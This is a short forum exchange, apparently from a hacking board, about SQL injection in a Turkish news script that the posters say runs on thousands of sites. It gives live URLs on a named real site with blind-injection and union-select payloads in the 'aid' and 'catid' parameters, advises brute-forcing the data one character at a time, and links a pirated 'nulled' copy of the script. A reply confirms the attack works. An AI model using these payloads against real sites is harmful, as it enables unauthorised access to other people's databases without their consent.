this turkish news script accepts sql injection, but there are no results (i can not inject char). this is very important bug, because there are several thousand sites with this script!

check it here:

http://www.medyapolitik.com/tr/article_view.php?aid=1888-1

is same result
http://www.medyapolitik.com/tr/article_view.php?aid=1887

you can download nulled script here
http://rapidshare.com/files/33605976/internethaber.com.rar

http://www.medyapolitik.com/tr/article_view.php?aid=1888+and+substring(version(), 1,1)=5/*

u can use subqueries with sql one char bruteforce, in fact the script probably selects one item from news that contents all the text and other info about it (there exist two or more queries for this parametr and they have different number of collumns) so u cant output the info directly

If you are interested in this site, but it was not the script, that is the withdrawal of the injection
http://www.medyapolitik.com/tr/cats.php?catid=-10%20union%20select%201/*
sorry for my english... translate.google.com)

thank you very much it works :))))

You're welcome;)